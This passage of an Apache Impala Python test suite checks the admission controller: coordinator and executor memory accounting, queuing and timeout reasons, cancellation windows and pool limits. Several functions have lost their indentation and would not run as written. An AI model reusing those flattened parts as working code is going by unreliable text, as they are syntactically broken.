    exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem
    self.client.set_configuration(exec_options)
    handle = self.client.execute_async(QUERY.format(1))
    self.client.wait_for_finished_timeout(handle, 1000)
    mem_to_admit = self.__get_mem_limits_admission_debug_page()
    # Float comparison with a tiny epsilon; both roles should be capped to 60MB.
    assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\
        "mem_to_admit:" + str(mem_to_admit)
    assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \
        "mem_to_admit:" + str(mem_to_admit)
    self.client.close_query(handle)

    # If the query is only scheduled on the coordinator then the mem to admit on executor
    # should be zero.
    exec_options['NUM_NODES'] = 1
    self.client.set_configuration(exec_options)
    handle = self.client.execute_async(QUERY.format(1))
    self.client.wait_for_finished_timeout(handle, 1000)
    mem_to_admit = self.__get_mem_limits_admission_debug_page()
    assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \
        "mem_to_admit:" + str(mem_to_admit)
    assert abs(mem_to_admit['executor'] - 0) < 0.0001, \
        "mem_to_admit:" + str(mem_to_admit)
    self.client.close_query(handle)

    # Make sure query execution works perfectly for a query that does not have any
    # fragments schdeuled on the coordinator, but has runtime-filters that need to be
    # aggregated at the coordinator.
    exec_options = vector.get_value('exec_option')
    exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000
    query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey
    FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders
    ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database)
    result = self.execute_query_expect_success(self.client, query, exec_options)
    assert "Runtime filters: All filters arrived" in result.runtime_profile
  def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates):
    """Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies
    the actual vs expected values for mem admitted and mem limit for both coord and
    executor. Also verifies that those memory values are different if
    'using_dedicated_coord_estimates' is true.

    Cross-checks three sources for each query: the admission debug page
    (expected), the memz page mem-trackers (actual enforced limits), and the
    backends debug page (mem admitted), allowing a 5MB rounding margin."""
    self.client.set_configuration_option('request_pool', "root.regularPool")
    ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
    # Use a test query that has unpartitioned non-coordinator fragments to make
    # sure those are handled correctly (IMPALA-10036).
    for query in [QUERY, QUERY_WITH_UNPARTITIONED_FRAGMENTS]:
      handle = self.client.execute_async(query.format(1))
      self.client.wait_for_finished_timeout(handle, 1000)
      expected_mem_limits = self.__get_mem_limits_admission_debug_page()
      actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id)
      mem_admitted =\
          get_mem_admitted_backends_debug_page(self.cluster, self.get_ac_process())
      # Collected up-front so every assertion below can report full context.
      debug_string = " expected_mem_limits:" + str(
        expected_mem_limits) + " actual_mem_limits:" + str(
        actual_mem_limits) + " mem_admitted:" + str(mem_admitted)
      MB = 1 << 20
      # Easiest way to check float in-equality.
      # With dedicated coord estimates, coordinator and executor limits must differ.
      assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[
        'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string
      # There may be some rounding errors so keep a margin of 5MB when verifying
      assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[
        'coordinator']) < 5 * MB, debug_string
      assert abs(actual_mem_limits['executor'] - expected_mem_limits[
        'executor']) < 5 * MB, debug_string
      assert abs(mem_admitted['coordinator'] - expected_mem_limits[
        'coordinator']) < 5 * MB, debug_string
      assert abs(
        mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \
        debug_string
      # Ensure all fragments finish executing before running next query.
      self.client.fetch(query, handle)
      self.client.close_query(handle)
def __get_mem_limits_admission_debug_page(self):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem_limit calculated by the admission controller from the impala admission debug page
of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator'
and 'executor' and their respective mem values in bytes."""
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
response_json = self.get_ac_process().service.get_debug_webpage_json("admission")
assert 'resource_pools' in response_json
assert len(response_json['resource_pools']) == 1
assert response_json['resource_pools'][0]['running_queries']
assert len(response_json['resource_pools'][0]['running_queries']) == 1
query_info = response_json['resource_pools'][0]['running_queries'][0]
return {'coordinator': float(query_info["coord_mem_to_admit"]),
'executor': float(query_info["mem_limit"])}
def __get_mem_limits_memz_debug_page(self, query_id):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem limits enforced on the query (identified by the 'query_id') extracted from
mem-tracker's output on the memz debug page of the dedicated coordinator and the
executor impala daemons. Returns a dictionary with the keys 'coordinator' and
'executor' and their respective mem values in bytes."""
metric_name = "Query({0})".format(query_id)
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in
self.cluster.impalads]
return {'coordinator': float(mem_trackers[0]['limit']),
'executor': float(mem_trackers[1]['limit'])}
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
  def test_dedicated_coordinator_planner_estimates(self, vector, unique_database):
    """Planner tests to add coverage for coordinator estimates when using dedicated
    coordinators. Also includes coverage for verifying cluster memory admitted.

    Runs the dedicated-coord-mem-estimates test file against a copy of the
    vector so the shared vector is not mutated for other tests."""
    vector_copy = copy(vector)
    exec_options = vector_copy.get_value('exec_option')
    # Remove num_nodes from the options to allow test case runner to set it in one of
    # the test cases.
    del exec_options['num_nodes']
    # Do not turn the default cluster into 2-group one
    exec_options['test_replan'] = 0
    exec_options['num_scanner_threads'] = 1  # To make estimates consistently reproducible
    self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy,
                       unique_database)
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(num_exclusive_coordinators=1, cluster_size=2)
  def test_mem_limit_executors(self, vector, unique_database):
    """Verify that the query option mem_limit_executors is only enforced on the
    executors.

    Checks via the admission debug page that the executor limit equals the
    option's value while the coordinator limit stays below it."""
    expected_exec_mem_limit = "999999999"
    ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
    self.client.set_configuration({"MEM_LIMIT_EXECUTORS": expected_exec_mem_limit})
    handle = self.client.execute_async(QUERY.format(1))
    self.client.wait_for_finished_timeout(handle, 1000)
    # NOTE(review): despite the name, these are the limits reported on the
    # admission debug page for the running query.
    expected_mem_limits = self.__get_mem_limits_admission_debug_page()
    assert expected_mem_limits['executor'] > expected_mem_limits[
      'coordinator'], expected_mem_limits
    assert expected_mem_limits['executor'] == float(
      expected_exec_mem_limit), expected_mem_limits
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT,
queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS),
start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G",
statestored_args=_STATESTORED_ARGS)
def test_heterogeneous_proc_mem_limit(self, vector):
""" Test to ensure that the admission controller takes into account the actual proc
mem limits of each impalad. Starts a cluster where the last impalad has a smaller
proc mem limit than other impalads and runs queries where admission/rejection decision
depends on the coordinator knowing the other impalad's mem limits.
The queue_wait_timeout_ms has been set to be more than the prioritized statestore
update time, so that the queries don't time out before receiving updates to pool
stats"""
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg, (select 1) B limit 1"
# Successfully run a query with mem limit equal to the lowest process memory among
# impalads
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
self.execute_query_expect_success(self.client, query, exec_options)
# Test that a query scheduled to run on a single node and submitted to the impalad
# with higher proc mem limit succeeds.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
exec_options['num_nodes'] = "1"
self.execute_query_expect_success(self.client, query, exec_options)
# Exercise rejection checks in admission controller.
try:
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "3G"
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
" is greater than memory available for admission 2.00 GB of \S+", str(e)), \
str(e)
# Exercise queuing checks in admission controller.
try:
# Wait for previous queries to finish to avoid flakiness.
for impalad in self.cluster.impalads:
impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
impalad_with_2g_mem.execute_async("select sleep(1000)")
# Wait for statestore update to update the mem admitted in each node.
sleep(STATESTORE_RPC_FREQUENCY_MS / 1000)
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "2G"
# Since Queuing is synchronous and we can't close the previous query till this
# returns, we wait for this to timeout instead.
self.execute_query(query, exec_options)
except ImpalaBeeswaxException as e:
assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
"2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
finally:
if impalad_with_2g_mem is not None:
impalad_with_2g_mem.close()
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
        max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
      statestored_args=_STATESTORED_ARGS)
  def test_cancellation(self):
    """ Test to confirm that all Async cancellation windows are hit and are able to
    succesfully cancel the query

    Uses debug_action sleep injections to widen each cancellation window
    (before admission, before/after coordinator start, after admission outcome)
    and verifies via log messages and admission metrics that each path was
    exercised."""
    impalad = self.cluster.impalads[0]
    client = impalad.service.create_beeswax_client()
    try:
      # Window 1: cancelled while sleeping before admission; query would have
      # been rejected (mem_limit above the process limit).
      client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
      client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
      handle = client.execute_async("select 1")
      sleep(1)
      client.close_query(handle)
      self.assert_log_contains(self.get_ac_log_name(), 'INFO',
        "Ready to be Rejected but already cancelled, query id=")

      # Window 2: cancelled before admission; query would have been admitted.
      client.clear_configuration()
      client.set_configuration_option("debug_action", "AC_BEFORE_ADMISSION:SLEEP@2000")
      handle = client.execute_async("select 2")
      sleep(1)
      client.close_query(handle)
      self.assert_log_contains(self.get_ac_log_name(), 'INFO',
        "Ready to be Admitted immediately but already cancelled, query id=")

      # Window 3: cancelled while the coordinator is starting.
      client.set_configuration_option("debug_action",
        "CRS_BEFORE_COORD_STARTS:SLEEP@2000")
      handle = client.execute_async("select 3")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
        "Cancelled right after starting the coordinator query id=")

      # Window 4: cancelled just after the coordinator has started (expects the
      # same log line a second time, hence the trailing 2).
      client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
      handle = client.execute_async("select 4")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
        "Cancelled right after starting the coordinator query id=", 2)

      # Window 5: a queued query cancelled while waiting for the admission outcome.
      client.clear_configuration()
      handle = client.execute_async("select sleep(10000)")
      client.set_configuration_option("debug_action",
        "AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
      queued_query_handle = client.execute_async("select 5")
      sleep(1)
      assert client.get_state(queued_query_handle) == QueryState.COMPILED
      assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      # Only cancel the queued query, because close will wait till it unregisters, this
      # gives us a chance to close the running query and allow the dequeue thread to
      # dequeue the queue query
      client.cancel(queued_query_handle)
      client.close_query(handle)
      client.close_query(queued_query_handle)
      queued_profile = client.get_runtime_profile(queued_query_handle)
      assert "Admission result: Cancelled (queued)" in queued_profile, queued_profile
      self.assert_log_contains(
        self.get_ac_log_name(), 'INFO', "Dequeued cancelled query=")

      # Window 6: a queued query closed directly while still queued.
      client.clear_configuration()
      handle = client.execute_async("select sleep(10000)")
      queued_query_handle = client.execute_async("select 6")
      sleep(1)
      assert client.get_state(queued_query_handle) == QueryState.COMPILED
      assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      client.close_query(queued_query_handle)
      client.close_query(handle)
      queued_profile = client.get_runtime_profile(queued_query_handle)
      assert "Admission result: Cancelled (queued)" in queued_profile

      # Drain the cluster, then verify the admission metrics add up: 4 admitted,
      # 2 queued, none left running.
      for i in self.cluster.impalads:
        i.service.wait_for_metric_value(
          "impala-server.num-fragments-in-flight", 0, timeout=20)
      assert self.get_ac_process().service.get_metric_value(
        "admission-controller.agg-num-running.default-pool") == 0
      assert self.get_ac_process().service.get_metric_value(
        "admission-controller.total-admitted.default-pool") == 4
      assert self.get_ac_process().service.get_metric_value(
        "admission-controller.total-queued.default-pool") == 2
    finally:
      client.close()
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
        pool_max_mem=1024 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_queue_reasons_num_queries(self):
    """Test that queue details appear in the profile when queued based on num_queries.

    With max_requests=1, of NUM_QUERIES concurrent queries exactly one runs;
    one queues because the running-query limit is hit and the rest queue
    because the queue is already non-empty."""
    # Run a bunch of queries - one should get admitted immediately, the rest should
    # be dequeued one-by-one.
    STMT = "select sleep(1000)"
    TIMEOUT_S = 60
    EXPECTED_REASON = \
        "Latest admission queue reason: number of running queries 1 is at or over limit 1"
    NUM_QUERIES = 5
    profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
        TIMEOUT_S)
    num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
    assert num_reasons == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    init_queue_reasons = self.__extract_init_queue_reasons(profiles)
    assert len(init_queue_reasons) == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    # Exactly one query hit the running-query limit directly ...
    over_limit_details = [detail
        for detail in init_queue_reasons if 'number of running queries' in detail]
    assert len(over_limit_details) == 1, \
        "One query initially queued because of num_queries: " + '\n===\n'.join(profiles)
    # ... and the remaining NUM_QUERIES - 2 queued behind it.
    queue_not_empty_details = [detail
        for detail in init_queue_reasons if 'queue is not empty' in detail]
    assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
        "Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
        pool_max_mem=10 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_queue_reasons_memory(self):
    """Test that queue details appear in the profile when queued based on memory.

    pool_max_mem is 10MB and each query requests a 9MB mem_limit, so only one
    query fits at a time; one queues on aggregate memory and the rest queue
    because the queue is already non-empty."""
    # Run a bunch of queries with mem_limit set so that only one can be admitted at a
    # time- one should get admitted immediately, the rest should be dequeued one-by-one.
    STMT = "select sleep(100)"
    TIMEOUT_S = 60
    EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\
        "available in pool default-pool with max mem resources 10.00 MB. Needed 9.00 MB" \
        " but only 1.00 MB was available."
    NUM_QUERIES = 5
    # IMPALA-9856: Disable query result spooling so that we can run queries with low
    # mem_limit.
    profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
        TIMEOUT_S, {'mem_limit': '9mb', 'spool_query_results': '0'})
    num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
    assert num_reasons == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    init_queue_reasons = self.__extract_init_queue_reasons(profiles)
    assert len(init_queue_reasons) == NUM_QUERIES - 1, \
        "All queries except first should have been queued: " + '\n===\n'.join(profiles)
    # Exactly one query queued directly on the memory check ...
    over_limit_details = [detail for detail in init_queue_reasons
        if 'Not enough aggregate memory available' in detail]
    assert len(over_limit_details) == 1, \
        "One query initially queued because of memory: " + '\n===\n'.join(profiles)
    # ... and the remaining NUM_QUERIES - 2 queued behind it.
    queue_not_empty_details = [detail
        for detail in init_queue_reasons if 'queue is not empty' in detail]
    assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
        "Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
def __extract_init_queue_reasons(self, profiles):
"""Return a list of the 'Admission Queue details' strings found in 'profiles'"""
matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles]
return [match.group(0) for match in matches if match is not None]
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
        pool_max_mem=10 * 1024 * 1024, proc_mem_limit=2 * 1024 * 1024,
        queue_wait_timeout_ms=1000),
      statestored_args=_STATESTORED_ARGS)
  def test_timeout_reason_host_memory(self):
    """Test that queue details appear in the profile when queued and then timed out
    due to a small 2MB host memory limit configuration.

    Queries may fail (allow_query_failure=True below) since the timed-out ones
    end in the EXCEPTION state; their profiles must still carry the host-memory
    timeout details including the topN query stats."""
    # Run a bunch of queries with mem_limit set so that only one can be admitted
    # immediately. The rest should be queued and dequeued (timeout) due to host memory
    # pressure.
    STMT = "select sleep(100)"
    TIMEOUT_S = 20
    NUM_QUERIES = 5
    # IMPALA-9856: Disable query result spooling so that we can run queries with low
    # mem_limit.
    profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
        TIMEOUT_S, {'mem_limit': '2mb', 'spool_query_results': '0'}, True)
    # Multi-part regex matched with re.DOTALL so '.*' spans profile lines.
    EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
        """default-pool.*"""\
        """Not enough memory available on host.*"""\
        """Stats for host.*"""\
        """topN_query_stats.*"""\
        """all_query_stats:.*"""
    num_reasons = len([profile for profile in profiles
        if re.search(EXPECTED_REASON, profile, re.DOTALL)])
    assert num_reasons >= 1, \
        "At least one query should have been timed out with topN query details: " +\
        '\n===\n'.join(profiles)
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10,
        pool_max_mem=2 * 1024 * 1024, proc_mem_limit=20 * 1024 * 1024,
        queue_wait_timeout_ms=1000),
      statestored_args=_STATESTORED_ARGS)
  def test_timeout_reason_pool_memory(self):
    """Test that queue details appear in the profile when queued and then timed out
    due to a small 2MB pool memory limit configuration.

    Counterpart of test_timeout_reason_host_memory: here the pool limit (2MB)
    is the bottleneck while the process limit (20MB) is not, so the timeout
    details cite pool-level aggregate memory instead of host memory."""
    # Run a bunch of queries with mem_limit set so that only one can be admitted
    # immediately. The rest should be queued and dequeued (timeout) due to pool memory
    # pressure.
    STMT = "select sleep(100)"
    TIMEOUT_S = 20
    NUM_QUERIES = 5
    # IMPALA-9856: Disable query result spooling so that we can run queries with low
    # mem_limit.
    profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
        TIMEOUT_S, {'mem_limit': '2mb', 'spool_query_results': '0'}, True)
    # Multi-part regex matched with re.DOTALL so '.*' spans profile lines.
    EXPECTED_REASON = """.*Admission for query exceeded timeout 1000ms in pool """\
        """default-pool.*"""\
        """Not enough aggregate memory available in pool default-pool.*"""\
        """Aggregated stats for pool.*"""\
        """topN_query_stats.*"""
    num_reasons = len([profile for profile in profiles
        if re.search(EXPECTED_REASON, profile, re.DOTALL)])
    assert num_reasons >= 1, \
        "At least one query should have been timed out with topN query details: " +\
        '\n===\n'.join(profiles)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=100, max_queued=10,
pool_max_mem=-1, admission_control_slots=4,
executor_groups="default-pool-group1"),
statestored_args=_STATESTORED_ARGS)
def test_queue_reasons_slots(self):
"""Test that queue details appear in the profile when queued based on number of
slots."""
# Run a bunch of queries - one should get admitted immediately, the rest should
# be dequeued one-by-one.
STMT = "select min(ss_wholesale_cost) from tpcds_parquet.store_sales"
TIMEOUT_S = 60
EXPECTED_REASON = "Latest admission queue reason: Not enough admission control " +\
"slots available on host"
NUM_QUERIES = 5
# Metric incremented when dequeueing fails because the coordinator has no free slot.
coordinator_limited_metric = \
"admission-controller.total-dequeue-failed-coordinator-limited"
original_metric_value = self.get_ac_process().service.get_metric_value(
coordinator_limited_metric)
# mt_dop=4 makes each query consume all 4 admission control slots, so queries can
# only run one at a time.
profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)],
TIMEOUT_S, config_options={"mt_dop": 4})
# All but the first query should have been queued for lack of slots at some point.
num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile])
assert num_reasons == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
init_queue_reasons = self.__extract_init_queue_reasons(profiles)
assert len(init_queue_reasons) == NUM_QUERIES - 1, \
"All queries except first should have been queued: " + '\n===\n'.join(profiles)
# Only the second query sees "not enough slots" as its *initial* reason; later
# arrivals are queued simply because the queue is already non-empty.
over_limit_details = [detail
for detail in init_queue_reasons
if "Not enough admission control slots available on host" in detail]
assert len(over_limit_details) == 1, \
"One query initially queued because of slots: " + '\n===\n'.join(profiles)
queue_not_empty_details = [detail
for detail in init_queue_reasons if 'queue is not empty' in detail]
assert len(queue_not_empty_details) == NUM_QUERIES - 2, \
"Others queued because of non-empty queue: " + '\n===\n'.join(profiles)
# Confirm that the cluster quiesces and all metrics return to zero.
for impalad in self.cluster.impalads:
verifier = MetricVerifier(impalad.service)
verifier.wait_for_backend_admission_control_state()
# The number of admission control slots on the coordinator is limited
# so the failures to dequeue should trigger a bump in the coordinator_limited_metric.
later_metric_value = self.get_ac_process().service.get_metric_value(
coordinator_limited_metric)
assert later_metric_value > original_metric_value, \
"Metric %s did not change" % coordinator_limited_metric
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
pool_max_mem=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_query_locations_correctness(self, vector):
"""Regression test for IMPALA-7516: Test to make sure query locations and in-flight
queries are correct for different admission results that can affect it."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Choose a query that runs on all 3 backends.
query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1"
# Case 1: When a query runs successfully, it is accounted on every backend while
# open and disappears everywhere once closed.
handle = self.client.execute_async(query)
self.__assert_num_queries_accounted(1)
self.close_query(handle)
self.__assert_num_queries_accounted(0)
# Case 2: When a query is queued then cancelled. max_requests=1 guarantees the
# second submission queues behind the first.
handle_running = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_running)
handle_queued = self.client.execute_async(query)
self.client.wait_for_admission_control(handle_queued)
self.get_ac_process().service.wait_for_metric_value(
"admission-controller.total-queued.default-pool", 1)
# Queued queries don't show up on backends
self.__assert_num_queries_accounted(1, 1)
# First close the queued query
self.close_query(handle_queued)
self.close_query(handle_running)
self.__assert_num_queries_accounted(0)
# Case 3: When a query gets rejected (1 byte mem_limit cannot be admitted), it must
# never be accounted anywhere.
exec_options = copy(vector.get_value('exec_option'))
exec_options['mem_limit'] = "1b"
self.execute_query_expect_failure(self.client, query, exec_options)
self.__assert_num_queries_accounted(0)
def __assert_num_queries_accounted(self, num_running, num_queued=0):
  """Checks if the num of queries accounted by query_locations and in-flight are as
  expected.

  'num_running' is the number of queries expected to be registered on each backend;
  'num_queued' is the number of additional queries tracked as in-flight by the
  coordinator but not yet running on any backend.
  """
  # Queued queries count as in-flight on the coordinator even before admission.
  num_inflight = num_running + num_queued
  # Wait for queries to start/un-register.
  assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight)
  query_locations = self.impalad_test_service.get_query_locations()
  for host, num_q in query_locations.items():
    # Fixed: the message previously used {0} for both placeholders and passed only
    # query_locations, so the expected count never appeared in the failure output.
    assert num_q == num_running, "There should be {0} running queries on either " \
        "impalads: {1}".format(num_running, query_locations)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
    impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="mem-limit-test-fair-scheduler.xml",
        llama_site_file="mem-limit-test-llama-site.xml", make_copy=True),
    statestored_args=_STATESTORED_ARGS)
def test_pool_mem_limit_configs(self, vector):
  """Runs functional tests for the max/min_query_mem_limit pool config attributes"""
  opts = vector.get_value('exec_option')
  # Pin this to the default value so plans are stable across test configurations.
  opts['exec_single_node_rows_threshold'] = 100
  # With a single node the per_host and per_cluster values map one-to-one, which
  # keeps the expected results in the test file easy to reason about.
  opts['num_nodes'] = 1
  self.run_test_case('QueryTest/admission-max-min-mem-limits', vector)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
    impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="mem-limit-test-fair-scheduler.xml",
        llama_site_file="mem-limit-test-llama-site.xml",
        additional_args="-default_pool_max_requests 1", make_copy=True),
    statestored_args=_STATESTORED_ARGS)
def test_pool_config_change_while_queued(self, vector):
  """Tests that the invalid checks work even if the query is queued. Makes sure that a
  queued query is dequeued and rejected if the config is invalid."""
  # IMPALA-9856: This test modifies the request pool's max-query-mem-limit.
  # Therefore, we disable query result spooling so that the min reservation of
  # queries being run stays low by not involving BufferedPlanRootSink.
  self.client.set_configuration_option('spool_query_results', 'false')
  pool_name = "invalidTestPool"
  config_str = "max-query-mem-limit"
  self.client.set_configuration_option('request_pool', pool_name)
  # Setup to queue a query: the long sleep holds the pool's single request slot.
  sleep_query_handle = self.client.execute_async("select sleep(10000)")
  self.client.wait_for_admission_control(sleep_query_handle)
  self._wait_for_change_to_profile(sleep_query_handle,
      "Admission result: Admitted immediately")
  queued_query_handle = self.client.execute_async("select 2")
  self._wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
  # Change config to be invalid (a 1-byte limit cannot admit any query).
  llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml")
  config = ResourcePoolConfig(
      self.cluster.impalads[0].service, self.get_ac_process().service, llama_site_path)
  config.set_config_value(pool_name, config_str, 1)
  # Close running query so the queued one gets a chance.
  self.client.close_query(sleep_query_handle)
  # Observe that the queued query fails. (Dropped the stray trailing comma that
  # turned this statement into building a throwaway 1-tuple.)
  self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20)
  self.close_query(queued_query_handle)
  # Change the config back to a valid value
  config.set_config_value(pool_name, config_str, 0)
  # Now do the same thing for change to pool.max-query-mem-limit such that it can no
  # longer accommodate the largest min_reservation.
  # Setup to queue a query.
  sleep_query_handle = self.client.execute_async("select sleep(10000)")
  self.client.wait_for_admission_control(sleep_query_handle)
  queued_query_handle = self.client.execute_async(
      "select * from functional_parquet.alltypes limit 1")
  self._wait_for_change_to_profile(queued_query_handle, "Admission result: Queued")
  # Change config to something less than the what is required to accommodate the
  # largest min_reservation (which in this case is 32.09 MB).
  config.set_config_value(pool_name, config_str, 25 * 1024 * 1024)
  # Close running query so the queued one gets a chance.
  self.client.close_query(sleep_query_handle)
  # Observe that the queued query fails (stray trailing comma removed here too).
  self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20)
  self.close_query(queued_query_handle)
def _wait_for_change_to_profile(
    self, query_handle, search_string, timeout=20, client=None):
  """Polls the runtime profile of 'query_handle' until 'search_string' appears in
  it, checking ten times per second for up to 'timeout' seconds. Fails the test if
  the string never shows up."""
  if client is None:
    client = self.client
  total_polls = timeout * 10
  for _ in range(total_polls):
    profile = client.get_runtime_profile(query_handle)
    if search_string in profile:
      return
    sleep(0.1)
  # 'profile' holds the last snapshot fetched above; include it for debugging.
  assert False, "Timed out waiting for change to profile\nSearch " \
      "String: {0}\nProfile:\n{1}".format(search_string, str(profile))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
    impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
        pool_max_mem=1024 * 1024 * 1024))
@needs_session()
def test_queuing_status_through_query_log_and_exec_summary(self):
  """Test to verify that the HS2 client's GetLog() call and the ExecSummary expose
  the query's queuing status, that is, whether the query was queued and what was the
  latest queuing reason."""
  # Start a long running query.
  long_query_resp = self.execute_statement("select sleep(10000)")
  # Ensure that the query has started executing.
  self.wait_for_admission_control(long_query_resp.operationHandle)
  # Submit another query; with max_requests=1 it must queue behind the first one.
  queued_query_resp = self.execute_statement("select 1")
  # Wait until the query is queued.
  self.wait_for_operation_state(queued_query_resp.operationHandle,
      TCLIService.TOperationState.PENDING_STATE)
  # Check whether the query log message correctly exposes the queuing status.
  log = self.wait_for_log_message(
      queued_query_resp.operationHandle, "Admission result :")
  assert "Admission result : Queued" in log, log
  # Fixed: this was previously two statements — an always-true assert on a bare
  # string literal, then a discarded expression. Parenthesizing makes the implicit
  # string concatenation a single operand of 'in'.
  assert ("Latest admission queue reason : number of running queries 1 is at or over "
          "limit 1") in log, log
  # Now check the same for ExecSummary.
  summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq()
  summary_req.operationHandle = queued_query_resp.operationHandle
  summary_req.sessionHandle = self.session_handle
  exec_summary_resp = self.hs2_client.GetExecSummary(summary_req)
  assert exec_summary_resp.summary.is_queued
  assert "number of running queries 1 is at or over limit 1" in \
      exec_summary_resp.summary.queued_reason, \
      exec_summary_resp.summary.queued_reason
  # Close the running query.
